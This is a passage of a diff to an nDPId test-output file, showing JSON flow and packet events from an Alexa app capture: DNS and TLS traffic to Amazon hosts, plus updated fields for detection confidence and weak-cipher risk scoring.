+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1490976041151,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1490976041151,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR0jdAAEARu2qsECoBrBAq2AA11mYAPRDBociBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAUABDRe6IY="}
-00760{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041156,"flow_last_seen":1490976041156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976041156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1490976041156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041156,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TnBAAEAG+H6sECrYNF7ohrJdAbvhYQATAAAAAKAC\/\/9vSwAAAgQFtAQCCAoA9k5jAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1490976041212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976041212,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwBzRAAOcGmMY0XuiGrBAq2AG7sl2f4NcN4WEAFHASH\/5jwQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1490976041215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976041215,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTnFAAEAG+JGsECrYNF7ohrJdAbvhYQAUn+DXDlAQAVeuMgAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01516{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01623{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041384,"flow_last_seen":1490976041384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976041384,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1490976041384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041384,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807JAAEAGczysECrYNF7ohrJeAbv1uZ3IAAAAAKAC\/\/+9JQAAAgQFtAQCCAoA9k56AAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041400,"flow_last_seen":1490976041400,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976041400,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -158,82 +158,82 @@
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1490976041437,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QlfcAAAAAG6PI3FAUAABzNwAAAAAAAAAA"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1490976041439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976041439,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwm7lAAOcGBEE0XuiGrBAq2AG7sl5u82R89bmdyXASH\/5VMQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1490976041440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976041440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07NAAEAGc0+sECrYNF7ohrJeAbv1uZ3JbvNkfVAQAVefogAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1490976041446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976041446,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwNmhAAOcGaZI0XuiGrBAq2AG7sl88IzNAq4r0I3ASH\/6tEQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1490976041447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976041447,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoul9AAEAGjKOsECrYNF7ohrJfAburivQjPCMzQVAQAVf3ggAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041680,"flow_last_seen":1490976041680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976041680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1490976041680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzJAAEAGfuesECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9j3AAAAgQFtAQCCAoA9k6YAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1490976041770,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"ts_msec":1490976041770,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWlRAAEARM0qsECrYrBAqAVOPADUAQZgzlqMBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"}
-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1490976041806,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041806,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlVAAEARM2KsECrYrBAqActtADUAKHKAa+oBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="}
